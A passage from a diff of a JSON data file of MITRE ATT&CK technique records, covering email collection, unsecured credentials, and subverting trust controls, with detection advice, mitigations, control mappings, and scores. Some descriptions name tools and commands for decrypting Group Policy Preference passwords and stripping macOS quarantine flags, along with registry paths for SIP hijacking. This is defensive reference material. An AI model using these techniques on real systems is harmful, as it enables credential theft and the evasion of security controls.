+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "4.2",
+            "4.5",
+            "4.8",
+            "13.4",
+            "18.3",
+            "18.5",
+            "13.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "IA-3",
+            "IA-4",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.047619047619047616,
-            "detection_score": 0.1
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.06137048
+        "hardware_coverage": false
     },
     {
-        "tid": "T1114",
-        "name": "Email Collection",
-        "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ",
-        "url": "https://attack.mitre.org/techniques/T1114",
+        "tid": "T1552.006",
+        "name": "Unsecured Credentials: Group Policy Preferences",
+        "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n",
+        "url": "https://attack.mitre.org/techniques/T1552/006",
         "tactics": [
-            "Collection"
+            "Credential Access"
         ],
-        "detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
+        "detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)",
         "platforms": [
-            "Google Workspace",
-            "Linux",
-            "Office 365",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
             "Command: Command Execution",
-            "File: File Access",
-            "Logon Session: Logon Session Creation",
-            "Network Traffic: Network Connection Creation"
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1114.001",
-                "name": "Email Collection: Local Email Collection",
-                "url": "https://attack.mitre.org/techniques/T1114/001",
-                "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
-                "detection": "Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1114.002",
-                "name": "Email Collection: Remote Email Collection",
-                "url": "https://attack.mitre.org/techniques/T1114/002",
-                "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
-                "detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    }
-                ]
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
             },
-            {
-                "tid": "T1114.003",
-                "name": "Email Collection: Email Forwarding Rule",
-                "url": "https://attack.mitre.org/techniques/T1114/003",
-                "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)",
-                "detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
             {
                 "mid": "M1047",
                 "name": "Audit",
@@ -6494,111 +29502,128 @@
                 "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
-            },
-            {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
             }
         ],
-        "cumulative_score": 0.4523809523809524,
-        "adjusted_score": 0.4523809523809524,
+        "cumulative_score": 0.3190476190476191,
+        "adjusted_score": 0.3190476190476191,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "6.3",
-            "6.5",
+            "3.1",
+            "3.2",
+            "4.1",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
             "18.3",
-            "18.5",
-            "3.10"
+            "18.5"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-19",
-            "AC-20",
-            "AC-3",
-            "AC-4",
+            "AC-2",
+            "AC-5",
+            "AC-6",
+            "CA-8",
             "CM-2",
             "CM-6",
             "IA-2",
             "IA-5",
-            "SC-7",
-            "SI-12",
-            "SI-4",
-            "SI-7"
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SI-2",
+            "SI-4"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2523809523809524,
-            "mitigation_score": 0.34545454545454546,
-            "detection_score": 0.15
-        },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1115",
-        "name": "Clipboard Data",
-        "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nIn Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)",
-        "url": "https://attack.mitre.org/techniques/T1115",
+        "tid": "T1552.007",
+        "name": "Unsecured Credentials: Container API",
+        "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ",
+        "url": "https://attack.mitre.org/techniques/T1552/007",
         "tactics": [
-            "Collection"
+            "Credential Access"
         ],
-        "detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.",
+        "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Containers"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution"
+            "File: File Access",
+            "User Account: User Account Authentication"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.1380952380952381,
-        "adjusted_score": 0.1380952380952381,
+        "mitigations": [
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.14285714285714285,
+        "adjusted_score": 0.14285714285714285,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
+        "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [],
-        "nist_controls": [],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "SC-46",
+            "SC-7",
+            "SC-8"
+        ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.03809523809523809,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1119",
-        "name": "Automated Collection",
-        "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.",
-        "url": "https://attack.mitre.org/techniques/T1119",
+        "tid": "T1553",
+        "name": "Subvert Trust Controls",
+        "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ",
+        "url": "https://attack.mitre.org/techniques/T1553",
         "tactics": [
-            "Collection"
+            "Defense Evasion"
         ],
-        "detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
         "platforms": [
             "Linux",
             "Windows",
@@ -6606,53 +29631,188 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
-            "Script: Script Execution"
+            "File: File Metadata",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1553.001",
+                "name": "Subvert Trust Controls: Gatekeeper Bypass",
+                "url": "https://attack.mitre.org/techniques/T1553/001",
+                "description": "Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\n\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\n\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)",
+                "detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1553.002",
+                "name": "Subvert Trust Controls: Code Signing",
+                "url": "https://attack.mitre.org/techniques/T1553/002",
+                "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
+                "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1553.003",
+                "name": "Subvert Trust Controls: SIP and Trust Provider Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1553/003",
+                "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
+                "detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    }
+                ]
+            },
+            {
+                "tid": "T1553.004",
+                "name": "Subvert Trust Controls: Install Root Certificate",
+                "url": "https://attack.mitre.org/techniques/T1553/004",
+                "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL 